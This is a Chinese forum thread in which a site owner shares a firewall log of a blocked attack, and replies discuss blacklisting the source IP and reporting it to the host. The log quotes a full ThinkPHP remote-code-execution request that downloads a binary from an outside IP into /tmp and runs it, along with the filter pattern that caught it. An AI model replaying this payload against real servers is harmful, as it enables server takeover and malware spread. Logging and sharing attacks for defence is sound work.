纪念下第一次被人攻击

Init · 发表于 2019-2-4 07:15:43

用户IP 195.231.2.25
类型 GET 过滤器 args
URI地址
/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp/%20;wget%20http://168.235.82.199/MavDDzxY/maddy.x86%20;chmod%20777%20*%20maddy.x86;%20%20./maddy.x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp
User-Agent
python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.9.1.el6.x86_64
过滤规则
(invokefunction|call_user_func_array|\\think\\)
传入值
function:call_user_func_array
风险值
call_user_func_array

这ip就在渗透，有点舍不得加黑名单，Google出来好像是阿鲁巴的

Init · 发表于 2019-2-4 07:26:39

xiaonv110 发表于 2019-2-4 07:26

机场？？？？？？？
不是机场，自己的站

Init · 发表于 2019-2-4 14:33:10

168.235.82.199
这个病毒下载的ip是ramnode的，ramnode也不管吗》？已经abuse了，还是要自己动手D?

Fuck!Tencent · 发表于 2019-2-4 07:26:00

新建的站都会容易被攻击吧

babyby168 · 发表于 2019-2-4 14:35:23

大惊小怪系列

		自动登录	找回密码
密码			立即注册